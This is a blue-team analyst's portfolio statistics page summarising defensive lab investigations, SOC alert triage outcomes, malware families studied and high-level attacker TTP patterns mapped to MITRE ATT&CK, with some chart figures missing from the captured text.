// portfolio metrics

Lab Portfolio Stats

Wiki generated  ·  pages  ·  auto-generated from Obsidian vault
// About this page
This is an auto-generated snapshot from my Obsidian vault. It surfaces patterns across labs, SOC alerts, and a -page wiki covering malware families, threat actors, and MITRE techniques. Every number links back to a documented investigation. Full writeups at /blue-team/labs.
Platform & Difficulty
Platform Split
Difficulty Breakdown
Categories & Tools
Top Categories
Most Used Tools
MITRE ATT&CK Coverage
Tactics by Wiki Source Count
Malware Families Investigated
Confirmed Families
Notable Specialty Labs
APT / Nation-State
Gothic Panda series · andromeda-bot-unc4210 · revil_gold
Cloud Forensics
awsraid · azurehunt · rogueazure · spilledbucket
Supply Chain
3cxsupplychain · npm_supply_chain_attack
Memory Forensics
amadey · latent · firstweek · volatilitytraces
Ransomware IR
raasunfold · revil_gold · maranhao · ramnit
Unique Scenarios
containerbreak (escape) · androidbreach (mobile)
LetsDefend — SOC Alert Triage
Alert Categories
Severity Split
Outcome
FP causes: WinRAR/Google Update downloads, authorised pentest activity, legitimate domains flagged by keyword match
CVEs Investigated
Threat Actors Tracked
Recurring Attacker TTP Patterns
01 · Phishing → macro/exploit → PowerShell → payload download (~12 cases — Emotet, Maze, AsyncRAT, LummaStealer)
02 · CVE exploitation → web shell → privilege escalation (SharePoint ×2, Confluence, Splunk, PAN-OS)
03 · LOLBin proxy execution to bypass controls (mshta, certutil, rundll32, wscript, regsvr32)
04 · Brute force exposed service → valid account → RDP/VPN lateral access
05 · Living-off-the-land post-compromise (wmiexec, JuicyPotato, LinEnum, certutil, BloodHound)
Top MITRE Techniques — by Wiki Source Count
Full coverage mapped on the ATT&CK Heatmap →
Active growth area: Cloud forensics currently represents of labs. AWS CloudTrail/S3, Azure Sentinel, and Microsoft Defender for Cloud investigations are in active rotation — this number is moving.